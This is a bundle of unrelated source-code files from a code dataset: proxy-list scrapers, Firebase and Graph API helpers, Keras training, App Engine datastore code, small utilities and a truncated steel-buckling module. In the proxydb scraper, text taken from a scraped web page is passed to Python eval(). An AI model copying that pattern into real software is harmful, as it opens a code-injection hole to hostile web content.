+{"seq_id":"89250721","text":"\n# os.walk()的使用\nimport os\n\n# 枚举dirPath目录下的所有文件\n\ndef main():\n#begin\n\tfileDir = \"F:\" + os.sep + \"aaa\"\t\t# 查找F:\\aaa 目录下\t\n\tfor root, dirs, files in os.walk(fileDir):\n\t#begin\n\t\tfor dir in dirs:\n\t\t#begin\n\t\t\tprint(os.path.join(root, dir))\n\t\t#end\n\t\tfor file in files:\n\t\t#begin\n\t\t\tprint(os.path.join(root, file))\n\t\t#end\n\t#end\n\tos.system(\"pause\")\n#end\n\nif __name__ == '__main__':\n#begin\n\tmain()\n#end\n\n\n# 输出\n# F:\\aaa\\4\n# F:\\aaa\\1.txt\n# F:\\aaa\\2.txt\n# F:\\aaa\\3.txt\n# F:\\aaa\\4\\5.txt\n# F:\\aaa\\4\\6.txt\n# F:\\aaa\\4\\7.txt\n","sub_path":"fanli/327/327.py","file_name":"327.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"92763315","text":"# -*- coding: utf-8 -*-\n# Author: wz\nimport re\nimport base64\n\n'''\n在这个文件中配置爬取网站的具体规则\n并且将参数组装成字典的形式在GetProxy.py中调用\n'''\n\n\ndef get_proxy_from_xicidaili(mysql, tree):\n if tree is not None:\n # 第一行是表头\n trs = tree.xpath('//table/tr[position()>1]')\n for tr in trs:\n ip = tr[1].text\n # 先判断该ip是否已经存储过\n if not mysql.has_saved(ip):\n port = tr[2].text\n type = tr[5].text.lower()\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type,\n }\n # print(ip_dict)\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_ip3366(mysql, tree):\n if tree is not None:\n trs = tree.xpath('//tbody/tr')\n for tr in trs:\n # tr[0]:ip,tr[1]:端口,tr[3]:类型\n ip = tr[0].text\n if not mysql.has_saved(ip):\n port = tr[1].text\n # print(tr[1].__class__)\n type = tr[3].text.lower()\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type\n }\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_ip181(mysql, tree):\n if tree is not None:\n # 首行是表头\n trs = tree.xpath('//tbody//tr[position()>1]')\n for tr in trs:\n ip = tr[0].text\n if not mysql.has_saved(ip):\n port = tr[1].text\n type = 'https' if 'HTTPS' in tr[3].text else 'http'\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type\n }\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_proxydb(mysql, tree):\n if tree is not None:\n trs = tree.xpath('//tbody/tr')\n for tr in trs:\n # 不保存socks5,socks4类型的ip\n type = tr[4].text.strip().lower()\n if type in ['socks5', 'socks4']:\n break\n # 原网页是通过js得出的ip地址,所以需要进行转换\n # 获得原本的script语句\n script = tr[0].findtext('script')\n # 正则表达式匹配到需要的内容\n pattern = re.compile(r\".*?var \\w = '(.*?)'.*?var yy = atob\\('(.*?)'.*?var pp = (.*?) -1\", re.S)\n # match[0]:ip前部分,match[1]:ip后部分,match[3]:表达式,计算后是port\n match = re.findall(pattern, script)[0]\n # print(match[1].encode().decode('unicode-escape'))\n footer = match[1].encode().decode('unicode-escape')\n ip = (match[0])[::-1] + base64.b64decode(footer).decode()\n\n if not mysql.has_saved(ip):\n port = str(eval(match[2]))\n # print(type, ip, port)\n proxy_dict = {\n 'type': type,\n 'ip': ip,\n 'port': port\n }\n mysql.save_proxy(proxy_dict)\n\n\ndef get_proxy_from_swei360(mysql, tree):\n if tree is not None:\n trs = tree.xpath('//tbody/tr')\n for tr in trs:\n # tr[0]:ip,tr[1]:端口,tr[3]:类型\n ip = tr[0].text\n if not mysql.has_saved(ip):\n port = tr[1].text\n # print(tr[1].__class__)\n type = tr[3].text.lower()\n proxy_dict = {\n 'ip': ip,\n 'port': port,\n 'type': type\n }\n mysql.save_proxy(proxy_dict)\n\n\n'''\n字段属性说明\nname:网站名称\nurls:网址\nmethod:爬取该网站的具体方法\n'''\nxicidaili = {\n 'name': 'xicidaili',\n # map()返回一个map对象,可用for遍历,但是map对象是一次性的,遍历一次后就空了。所以最好还是用列表解析的方式来代替map()\n # 'urls': list(map(lambda x: 'http://www.xicidaili.com/nn/'+str(x), range(1, 3))),\n 'urls': ['http://www.xicidaili.com/nn/'+str(x) for x in range(1, 3)],\n 'method': get_proxy_from_xicidaili,\n}\n\nip3366 = {\n 'name': 'ip3366',\n # 'urls': list(map(lambda x: 'http://www.ip3366.net/?stype=1&page='+str(x), range(1, 6))),\n 'urls': ['http://www.ip3366.net/?stype=1&page='+str(x) for x in range(1, 6)],\n 'method': get_proxy_from_ip3366,\n}\n\nip181 = {\n 'name': 'ip181',\n 'urls': ['http://www.ip181.com/'],\n 'method': get_proxy_from_ip181,\n}\n\nproxydb = {\n 'name': 'proxydb',\n # 'urls': list(map(lambda x: 'http://proxydb.net/?country=CN&offset='+str(x), range(0, 250, 15))),\n 'urls': ['http://proxydb.net/?country=CN&offset='+str(x) for x in range(0, 255, 15)],\n 'method': get_proxy_from_proxydb,\n}\n\nswei360 = {\n 'name': 'swei360',\n # 'urls': list(map(lambda x: 'http://www.ip3366.net/?stype=1&page='+str(x), range(1, 6))),\n 'urls': ['http://www.swei360.com/free/?page='+str(x) for x in range(1, 8)],\n 'method': get_proxy_from_swei360,\n}\n\ntargets = [xicidaili, ip3366, ip181, proxydb, swei360]\n\n","sub_path":"Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"81412025","text":"import numpy as np\nimport torch\n\n# SET PATHS\n\nPATH_DATABASE = \"database/\"\nPATH_DATA = \"data/\"\nPATH_PLOTS = \"analysis/plots/\"\nPATH_LOGS = \"analysis/logs/\"\n\n# DECAY IDENTIFICATION\n\nANALYSIS_ID = \"CMS-PAS-SUS-12-026\"\nTXNAME = \"T1tttt\"\nMOTHER_LOW = 600\nMOTHER_UP = 1100\nMOTHER_STEP = 5\nLSP_LOW = 0\nLSP_STEP = 10\n\n# SPLIT INFORMATION\n\nSPLIT_CHOOSE = 1 #1 for split, 0 for no split\nSPLIT = [80, 10, 10] #train/val/test\n\nLEN_TEST_SET\t \t= 0\nLEN_TRAINING_SET \t= 0\nLEN_VALIDATION_SET \t= 0\n\n############\n\n# PICK RESULT\n\nEXP = \"CMS-PAS-SUS-12-026\"\nTX = \"T1tttt\"\n\n############\n\n# CONFIGURE PYTORCH\n\nCUDA = torch.cuda.is_available()\nMINI_BATCH_SIZE = 32\nDIM_IN = 2\nDIM_HIDDEN_1 = 4\nDIM_HIDDEN_2 = 16\nDIM_HIDDEN_3 = 4\nDIM_OUT = 1\nBATCH_SIZE_VAL = 59\nEPOCH_NUM = 200\nANALYSIS_SAMPLE_SIZE = 100\nHYPERLOSS_FUNCTION = \"lin\" #\"lin\", \"exp\"\n\n############\n\n# HYPERPARAMETERS\n\nINT_LOSS = 4\nINT_LOSS_SQ = 20\nHID_LAY_MAX = 2\nHID_LAY_MIN = 1\nHID_LAY_STEP = 1\nHID_LAY = range(HID_LAY_MIN,HID_LAY_MAX+1,HID_LAY_STEP)\nNOD_MAX = 16\nNOD_MIN = 12\nNOD_STEP = 4\nNOD = range(NOD_MIN, NOD_MAX+1,NOD_STEP)\nLR_MIN = 1e-3\nLR_MAX = 1.0001e-3\nLR_STEP = 9e-3\nLEARN_RATE = np.arange(LR_MIN, LR_MAX, LR_STEP)\nLOSS_FUNCTIONS = [\"MSE\"] #[\"MSE\"]\nOPTIMIZERS = [\"Adam\"] #[\"Adam\"]\nMINIBATCH_SIZES = [32]\nACTIVATION_FUNCTIONS = [\"rel\"]#, \"sig\", \"tah\"]\nSHAPES = [\"lin\"]#,\"trap\",\"ramp\"]\n#netdata = {}\n","sub_path":"system/glovar.py","file_name":"glovar.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"586121700","text":"# -*- coding: utf-8 -*-\n\"\"\"\n技術分析選股 TYPE 10 上傳Firebase\n\n@author: Bryson Xue\n\n@target_rul: \n\n@Note: \n\t選股結果上傳Firebase\n\n\"\"\"\nimport datetime\nfrom dateutil import parser\nimport pandas as pd\nimport xlrd\nimport sys, os\nfrom firebase import firebase\n\ndef MAIN_STOCK_SELECT_TYPE10_FB():\n\tprint(\"Executing \" + os.path.basename(__file__) + \"...\")\n\n\tdt=datetime.datetime.now()\n\tstr_date = parser.parse(str(dt)).strftime(\"%Y%m%d\")\n\texl_name = \"STOCK_SELECT_TYPE10_\" + str_date + \".xlsx\"\n\n\ttry:\n\t\twb = xlrd.open_workbook(exl_name, on_demand = True)\n\texcept Exception as e:\n\t\tprint('Err: 讀取 ' + exl_name + ' 選股excel檔異常.')\n\t\tprint(e.args)\n\t\treturn\n\n\tsh = wb.sheet_by_index(0)\n\trow_cnt = sh.nrows\n\n\tna_flag = False\n\t#print(sh.cell(0,0).value)\n\tif sh.cell(0,0).value == '今日無符合條件之股票.':\n\t\tna_flag = True\n\n\trow_ls = []\n\tif na_flag == False:\n\t\tfor i in range(1,row_cnt):\n\t\t\td = {}\n\t\t\t#print(i)\n\t\t\td['股票代號'] = sh.cell(i,0).value.replace('.TW','')\n\t\t\td['名稱'] = sh.cell(i,1).value\n\t\t\td['外資買賣超天數'] = sh.cell(i,4).value\n\t\t\td['投���買賣超天數'] = sh.cell(i,5).value\n\t\t\td['自營商買賣超天數'] = sh.cell(i,6).value\n\t\t\td['類別'] = sh.cell(i,7).value\n\t\t\t#print(d)\n\t\t\trow_ls.append(d)\n\n\t#關閉excel檔案\n\twb.release_resources()\n\tdel wb\n\n\t#print(row_ls)\n\t\n\ttry:\n\t\t#建立firebase資料連線\n\t\tdb_url = 'https://brysonxue-bfca6.firebaseio.com/'\n\t\tfdb = firebase.FirebaseApplication(db_url, None)\n\n\t\t#轉存firebase前,清空線上的資料\n\t\tfdb.delete('/STOCK_S10', None)\n\n\t\tif na_flag == False:\n\t\t\t#資料轉存firebase\n\t\t\tfor row in row_ls:\n\t\t\t\tfdb.post('/STOCK_S10', row)\n\n\t\t\tprint('上傳STOCK_S10成功.')\n\t\telse:\n\t\t\tprint('今日無符合條件之股票,不做資料上傳.')\n\n\texcept Exception as e:\n\t\tprint('Err: 資料上傳Firebase table => STOCK_S10異常.')\n\t\tprint(e.args)\n\t\treturn\n\n\tprint(\"End of prog.\\n\\n\")\n\nif __name__ == '__main__':\n\tMAIN_STOCK_SELECT_TYPE10_FB()\t","sub_path":"STOCK_SELECT_TYPE10_FB.py","file_name":"STOCK_SELECT_TYPE10_FB.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"514997329","text":"import os.path\nimport asyncio\n\nasync def process(root,tfile):\n try:\n fullpath = os.path.join(root,tfile)\n for line in open(fullpath):\n if \"{% extends\" in line:\n match = line[line.find(\"{% extends \\\"\"):\n line.find(\"\\\" %}\")]\n match2 = match.replace(\"{% extends \\\"\", \"\")\n print('{} <-- {}'.format(match2,fullpath))\n except UnicodeDecodeError:\n pass\n\n\nasync def traverse(targetpath):\n \"\"\"Visit all folders in directory, looks up extend and import tags.\"\"\"\n tasks = []\n for root, dirs, files in os.walk(targetpath, topdown=False):\n for tfile in files:\n task = asyncio.ensure_future(process(root,tfile))\n tasks.append(task)\n await asyncio.gather(*tasks, return_exceptions=False)\n","sub_path":"traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"545343442","text":"import logging\n\nfrom google.appengine.ext import ndb\n\nimport models\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_advertisers(keys=None):\n\n if keys is None:\n advertisers = list(models.Advertiser.query())\n else:\n if isinstance(keys, ndb.Key):\n advertisers = keys.get()\n else:\n advertisers = ndb.get_multi(keys)\n\n return advertisers\n\n\ndef create_blank_advertisee():\n\n advertisee = models.Advertisee()\n\n return advertisee\n\n\ndef create_blank_advertiser():\n\n advertisee = models.Advertiser()\n\n return advertisee\n\n\ndef get_advertisees():\n\n advertisers = list(models.Advertisee.query())\n\n return advertisers\n\n\ndef get_advertisee(id_):\n\n a = models.Advertisee.get_by_id(id_)\n\n return a\n\n\ndef get_advertiser(id_):\n\n a = models.Advertiser.get_by_id(id_)\n\n return a\n\n\ndef get_poc(id_):\n\n print(len(id_))\n poc = models.POC.get_by_id(id_)\n\n return poc\n\n\ndef create_poc():\n\n poc = models.POC()\n\n return poc\n\n\ndef put(models):\n\n if isinstance(models, ndb.Model):\n return models.put()\n else:\n return ndb.put_multi(models)\n\n\ndef get(specifiers, kind=None):\n\n if not isinstance(specifiers, (tuple, list)):\n if kind:\n specifiers = ndb.Key(kind, specifiers)\n return specifiers.get()\n\n if kind:\n specifiers = [ndb.Key(kind, x) for x in specifiers]\n\n return ndb.get_multi(specifiers)\n\n\ndef delete(specifiers, kind=None):\n\n if not isinstance(specifiers, (tuple, list)):\n specifiers = [specifiers]\n\n if kind:\n specifiers = [ndb.Key(kind, x) for x in specifiers]\n\n ndb.delete_multi(specifiers)\n\n\ndef remove_advertiser(advertisee_id, advertiser_id):\n\n a = get_advertisee(advertisee_id)\n\n k = ndb.Key(models.Advertiser, advertiser_id)\n\n a.advertisers.remove(k)\n\n a.put()\n\n\ndef add_advertiser(advertisee_id, advertiser_id):\n\n a = get_advertisee(advertisee_id)\n\n k = ndb.Key(models.Advertiser, advertiser_id)\n\n a.advertisers.append(k)\n\n a.put()\n\n\ndef delete_advertisee(id_):\n\n if id_ is not None:\n ndb.Key(models.Advertisee, id_).delete()\n\n\ndef delete_advertiser(id_):\n\n if id_ is not None:\n advertiser = get_advertiser(id_)\n to_delete = advertiser.pocs\n to_delete.append(advertiser.key)\n ndb.delete_multi(to_delete)\n\n to_put = []\n for advertisee in get_advertisees():\n try:\n advertisee.advertisers.remove(advertiser.key)\n except ValueError:\n pass\n else:\n to_put.append(advertisee)\n\n ndb.put_multi(to_put)\n\n\ndef insert_advertisexs():\n\n email_template_breitbart = \"\"\"\n Hey %s,\n\n I'm getting in touch with you as part of the Sleeping Giants campaign. Did you know that %s has ads appearing on Breitbart.com?\n Breitbart is widely known as a hate speech site, regularly distributing anti-Semitic, anti-Muslim, xenophobic and misogynist propaganda - and it's being propped up by ad revenues sent from companies like yours via 3rd party ad platforms.\n\n Is this something you support?\n\n If not, you can change this by contacting your ad agency and asking them to exclude Breitbart from your media buy.\n Will you please consider joining 700+ companies who have already blacklisted Breitbart? Please let me know. We would love to add you to the confirmed list!\n\n I hope to see the advertisements taken down,\n Sal\n \"\"\"\n\n breitbart_key = models.Advertisee(name='Breitbart', description='Hateful website with neonazi leader.', email=email_template_breitbart).put()\n poc_kayak_key = models.POC(name='Stephanie', email='sretcho@kayak.com').put()\n kayak_key = models.Advertiser(name='Kayak', pocs=[poc_kayak_key]).put()\n breitbart = breitbart_key.get()\n breitbart.advertisers.append(kayak_key)\n breitbart.put()\n\n\ndef insert_advertiser():\n\n poc_uber_key = models.POC(name='Alex', email='alex@gmail.com').put()\n models.Advertiser(name='Uber', pocs=[poc_uber_key]).put()\n","sub_path":"shared/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"137611182","text":"import json\nimport msal\n\n# This code based on Microsoft sample at https://github.com/AzureAD/microsoft-authentication-library-for-python/blob/dev/sample/confidential_client_secret_sample.py\n\n# Load settings from disk\noauth_settings = json.load(open('settings.json'))['Microsoft']\n\n# Create a preferably long-lived app instance which maintains a token cache.\napp = msal.ConfidentialClientApplication(\n oauth_settings['application_id'], authority=oauth_settings['authority'],\n client_credential=oauth_settings['secret'],\n)\n\n\ndef get_auth_header():\n \"\"\"Returns token ready for use as 'Authorization' header. Checks memory cache before fetching a new token.\"\"\"\n result = None\n\n # Check in-memory cache for existing token\n # Since we are looking for token for the current app, NOT for an end user,\n # we give account parameter as None.\n result = app.acquire_token_silent(oauth_settings['scope'], account=None)\n\n # If no token in cache, get a new one\n if not result:\n result = app.acquire_token_for_client(scopes=oauth_settings['scope'])\n\n if \"access_token\" in result:\n return result['token_type'] + ' ' + result['access_token']\n else:\n raise RuntimeError(\"Failed to get an authorization token.\", result.get(\n \"error\"), result.get(\"error_description\"), result.get(\"correlation_id\"))\n","sub_path":"graph_auth_helper.py","file_name":"graph_auth_helper.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"54582350","text":"from __future__ import print_function\nfrom keras.applications.resnet50 import ResNet50, preprocess_input\nfrom keras.layers import Input, AveragePooling2D\nfrom keras.models import Model\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nimport h5py\nimport matplotlib.pyplot as plt\nimport pickle\nimport keras\nimport numpy as np\nfrom keras import optimizers\nimport sklearn.metrics as sklm\nimport tensorflow as tf\nimport keras.backend as K\nimport os\nfrom keras.utils.np_utils import to_categorical\n\n# Get number of classes\nls1=os.listdir('color')\nif '.DS_Store' in ls1:\n ls1.remove('.DS_Store')\ndic1={}\nfor idx,i in enumerate(ls1):\n dic1[i]=idx\n print(i)\n\n#F1 through callback\nclass Metrics(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.confusion = []\n self.precision = []\n self.recall = []\n self.f1s = []\n\n def on_epoch_end(self, epoch, logs={}):\n score = np.asarray(self.model.predict(self.validation_data[0]))\n predict = np.round(np.asarray(self.model.predict(self.validation_data[0])))\n targ = self.validation_data[1]\n\n self.f1s.append(sklm.f1_score(targ, predict,average='micro'))\n self.confusion.append(sklm.confusion_matrix(targ.argmax(axis=1),predict.argmax(axis=1)))\n\n return\n\n# Loading saved predicted X and y\ndef load_bottleneck_data(training_file, validation_file):\n\n h5f = h5py.File('bftx_resnet.h5', 'r')\n X_train2 = h5f['bftx'][:]\n h5f.close()\n h5f = h5py.File('bfvx_resnet.h5', 'r')\n X_val2 = h5f['bfvx'][:]\n h5f.close()\n with open('bfty_resnet.pkl', 'rb') as f:\n y_train2 = pickle.load(f)\n with open('bfvy_resnet.pkl', 'rb') as f:\n y_val2 = pickle.load(f)\n\n return X_train2, y_train2, X_val2, y_val2\n\n# Calling the above function to load saved data\nX_train, y_train, X_val, y_val = load_bottleneck_data('resnet_train_bottleneck.json',\n 'resnet_validate_bottleneck.json')\nnum_classes = len(dic1)\ny_train = to_categorical(y_train, num_classes=num_classes)\ny_val = to_categorical(y_val,num_classes = num_classes)\n\n# input image dimensions\nimg_rows, img_cols = 256, 256\nh = 256\nw = 256\nch = 3\n\n#HYPERPARAMETERS\nbatch_size = 128\nnum_classes = len(dic1)\nepochs = 20\nprint(num_classes)\n#Model\ndef create_model_resnet():\n\n input_tensor = Input(shape=(h, w, ch))\n model = ResNet50(input_tensor=input_tensor, include_top=False, input_shape=(256,256,3))\n # x = model.output\n # x = Dropout()(x)\n # model = Model(model.input,x)\n return model\n\n#Adding final layer\nprint(X_train.shape)\ninput_shape = X_train.shape[1:]\ninp = Input(shape=input_shape)\nx = Flatten()(inp)\nx = Dense(num_classes, activation='softmax')(x)\nmodel = Model(inp, x)\n\nsgd = optimizers.SGD(lr=0.0007, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(optimizer= sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n\nmetrics = Metrics()\n\n\nwith tf.Session() as sess:\n # fetch session so Keras API can work\n K.set_session(sess)\n K.set_learning_phase(1)\n history =model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size,\n validation_data=(X_val, y_val), shuffle=True, verbose=1,callbacks=[metrics] )\n print(metrics.f1s)\n\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n print(history.history['acc'])\n # f1_mean = history.history['f1']\n # val_f1 = history.history['val_f1']\n\n # summarize history for accuracy\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train ' + str(acc[-1]), 'test ' + str(val_acc[-1])], loc='upper left')\n plt.show()\n\n # summarize history for loss\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train ' + str(loss[-1]), 'test ' + str(val_loss[-1])], loc='upper left')\n plt.show()\n\n # # summarize history for f1\n plt.plot(metrics.f1s)\n # plt.plot(history.history['val_f1'])\n plt.title('f1 mean score')\n plt.ylabel('f1')\n plt.xlabel('epoch')\n plt.legend(['val ' + str(metrics.f1s[-1])], loc='upper left')\n plt.show()\n\n print(metrics.confusion[-1])\n\n ans = input(\"Do you want to save the weights?\")\n if ans == 'y':\n model.save_weights('resnet_grapes_bottleneck_weights_temp.h5')\n print(\"Saved\")\n dir_path = os.path.dirname(os.path.realpath(__file__))\n print(dir_path)\nprint(\"Reach End \\n\")","sub_path":"model1_final.py","file_name":"model1_final.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"32443217","text":"from subprocess import Popen, PIPE\nfrom plyer.facades import UniqueID\nfrom plyer.utils import whereis_exe\n\nfrom os import environ\n\n\nclass FreeBSDUniqueID(UniqueID):\n def _get_uid(self):\n old_lang = environ.get('LANG')\n environ['LANG'] = 'C'\n dmidecode_process = Popen([\"dmidecode\", \"-quiet\"], stdout=PIPE, stderr=PIPE)\n grep_process = Popen([\"grep\", \"-m1\", \"serial:\"],\n stdin=dmidecode_process.stdout, stdout=PIPE)\n dmidecode_process.stdout.close()\n output = grep_process.communicate()[0]\n environ['LANG'] = old_lang\n\n if output:\n return output.split()[1]\n else:\n return None\n\n\ndef instance():\n import sys\n if whereis_exe('dmidecode'):\n return FreeBSDUniqueID()\n sys.stderr.write(\"dmidecode not found.\")\n return UniqueID()\n","sub_path":"plyer/platforms/freebsd/uniqueid.py","file_name":"uniqueid.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"68070106","text":"from ocdsextensionregistry import Extension\n\n\ndef test_init():\n args = arguments(Core='true')\n obj = Extension(args)\n\n assert obj.id == args['Id']\n assert obj.category == args['Category']\n assert obj.core is True\n\n\ndef test_repr():\n obj = Extension(arguments(Core='true'))\n\n assert repr(obj) == 'location'\n\n\ndef test_init_non_core():\n for core in ('TRUE', 'True', 'false', 'foo', '', None):\n obj = Extension(arguments(Core=core))\n\n assert obj.core is False\n\n\ndef test_as_dict():\n args = arguments(Core='')\n obj = Extension(args)\n\n assert obj.as_dict() == {\n 'id': args['Id'],\n 'category': args['Category'],\n 'core': False,\n }\n\n\ndef arguments(**kwargs):\n data = {\n 'Id': 'location',\n 'Category': 'item',\n }\n\n data.update(kwargs)\n return data\n","sub_path":"tests/test_extension.py","file_name":"test_extension.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"617439871","text":"age = int(input())\ntempsPermis = int(input())\nnbAccident = int(input())\nnbClients = int(input())\n\ntarif = [\"rouge\",\"orange\",\"vert\",\"bleu\"]\nclient = 0\n\nif (nbAccident >= 2):\n client = \"REFUSE\"\nelif (nbAccident == 0):\n if (age >= 25):\n if (tempsPermis >= 2):\n client = 2\n else:\n client = 1\n #endif*\n else:\n client = 0\nelif (nbAccident == 1):\n if (age < 25):\n client = 0\n else:\n client = 1\nelse:\n client = 0\n\nif (nbClients >= 5):\n client += 1;\n\nprint(tarif.pop(client))","sub_path":"Cnam-Algo/Algo Simple/6.2.py","file_name":"6.2.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"127986335","text":"import numpy as np\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.initialized = False\n self.val = None\n self.avg = None\n self.sum = None\n self.count = None\n\n def initialize(self, val, weight):\n self.val = val\n self.avg = val\n self.sum = val*weight\n self.count = weight\n self.initialized = True\n\n def update(self, val, weight=1):\n val = np.asarray(val)\n if not self.initialized:\n self.initialize(val, weight)\n else:\n self.add(val, weight)\n\n def add(self, val, weight):\n self.val = val\n self.sum += val * weight\n self.count += weight\n self.avg = self.sum / self.count\n\n def value(self):\n return self.val.tolist()\n\n def average(self):\n return self.avg.tolist()\n\n\ndef unique(ar, return_index=False, return_inverse=False, return_counts=False):\n ar = np.asanyarray(ar).flatten()\n\n optional_indices = return_index or return_inverse\n optional_returns = optional_indices or return_counts\n\n if ar.size == 0:\n if not optional_returns:\n ret = ar\n else:\n ret = (ar,)\n if return_index:\n ret += (np.empty(0, np.bool),)\n if return_inverse:\n ret += (np.empty(0, np.bool),)\n if return_counts:\n ret += (np.empty(0, np.intp),)\n return ret\n if optional_indices:\n perm = ar.argsort(kind='mergesort' if return_index else 'quicksort')\n aux = ar[perm]\n else:\n ar.sort()\n aux = ar\n flag = np.concatenate(([True], aux[1:] != aux[:-1]))\n\n if not optional_returns:\n ret = aux[flag]\n else:\n ret = (aux[flag],)\n if return_index:\n ret += (perm[flag],)\n if return_inverse:\n iflag = np.cumsum(flag) - 1\n inv_idx = np.empty(ar.shape, dtype=np.intp)\n inv_idx[perm] = iflag\n ret += (inv_idx,)\n if return_counts:\n idx = np.concatenate(np.nonzero(flag) + ([ar.size],))\n ret += (np.diff(idx),)\n return ret\n\n\ndef colorEncode(labelmap, colors):\n labelmap = labelmap.astype('int')\n labelmap_rgb = np.zeros((labelmap.shape[0], labelmap.shape[1], 3),\n dtype=np.uint8)\n for label in unique(labelmap):\n if label == 0:\n continue\n labelmap_rgb += (labelmap == label)[:, :, np.newaxis] * \\\n np.tile(colors[label-1],\n (labelmap.shape[0], labelmap.shape[1], 1))\n return labelmap_rgb\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"12200042","text":"# -*- coding: utf-8 -*-\n\"\"\"Resistance to lateral-torsional buckling\n\nThis module is created to aid the calculation principles for structural steel in fire situation set out in EC 1,\nPART 1-2. More detailed instruction can be found in F. Jean-Marc & R.P. Vila (2010) - Design of Steel Structures, which\nthe code in this module compliant with. Section 5.4 is particularly followed.\n\"\"\"\nimport numpy as np\nfrom project.dat.steel_carbon import thermal\n\n\ndef _M_cr(C_1, C_2, I_z, k_z, k_w, I_w, I_t, L, E, G, z_g):\n \"\"\"\n [Eq. 5.59]\n :param C_1: Constant, found in Table 5.4 or ECCS (2006)\n :param C_2: ECCS (2006) or in Galea Y (2002)\n :param I_z: Second moment of area about the minor axis\n :param k_z: 0.5 for full restraint, 0.7 for one end fixed and one pinned, 1.0 for both pinned\n :param k_w: 0.5 for full restraint, 0.7 for one end fixed and one pinned, 1.0 for both pinned\n :param I_w: Warping constant\n :param I_t: Torsion constant\n :param L: Beam/column length\n :param E: Steel modulus\n :param G: Steel ?\n :param z_g: Factor governed by the load location on the section, see Fig. 5.24\n :return M_cr: The elastic critical moment for a uniform moment\n \"\"\"\n a = C_1 * (np.pi**2 * E * I_z) / (k_z * L)**2\n b = (k_z / k_w)**2 * (I_w / I_z)\n c = (k_z * L)**2 * G * I_t / np.pi**2 / E / I_z\n d = (C_2 * z_g) ** 2\n e = C_2 * z_g\n\n M_cr = a * (b+c+d)**0.5 - e\n\n return M_cr\n\n\ndef _lambda_LT(W_pl_y, f_y, M_cr):\n \"\"\"\n [Eq. 5.66]\n :param W_pl_y: Plastic section modulus\n :param f_y: Yield strength\n :param M_cr: Critical bending moment, see [Eq. 5.59]\n :return lambda_LT: Non-dimensional slenderness at normal temperature\n \"\"\"\n\n lambda_LT = (W_pl_y * f_y / M_cr)**2\n\n return lambda_LT\n\n\ndef _lambda_LT_theta_com(lambda_LT, k_y_theta_com, k_E_theta_com):\n \"\"\"\n [Eq. 5.65]\n :param lambda_LT: Non-dimensional slenderness at normal temperature\n :param k_y_theta_com: Reduction factor for Young's modulus at the maximum steel temp. in the com. flange\n :param k_E_theta_com: Reduction factor for Young's modulus at the maximum steel temp. in the com. flange\n :return lambda_LT_theta_com: Non-dimensional slenderness at elevated temperature\n \"\"\"\n lambda_LT_theta_com = lambda_LT * (k_y_theta_com / k_E_theta_com)\n\n return lambda_LT_theta_com\n\ndef _alpha(f_y):\n \"\"\"\n [Eq. 5.64]\n :param f_y: Steel yield strength\n :return alpha: The imperfection factor\n \"\"\"\n\n alpha = 0.65 * (235/f_y) ** 0.5\n\n return alpha\n\ndef _phi_LT_theta_com(alpha, lambda_LT_theta_com):\n \"\"\"\n [Eq. 5.63]\n :param alpha: The imperfection factor\n :param lambda_LT_theta_com: Non-dimensional slenderness at elevated temeperature\n :return phi_LT_theta_com: A variable used in [5.64]\n \"\"\"\n\n phi_LT_theta_com = 0.5 * (1 + alpha * lambda_LT_theta_com + lambda_LT_theta_com**2)\n\n return phi_LT_theta_com\n\n\ndef _chi_LT_fi(phi_LT_theta_com, lambda_LT_theta_com):\n \"\"\"\n [Eq. 5.62]\n :param phi_LT_theta_com: Refer to [5.63]\n :param lambda_LT_theta_com: Non-dimensional slenderness at elevated temperature\n :return chi_LT_fi: Reduction factor for lateral-torsion buckling in the fire design situation\n \"\"\"\n\n 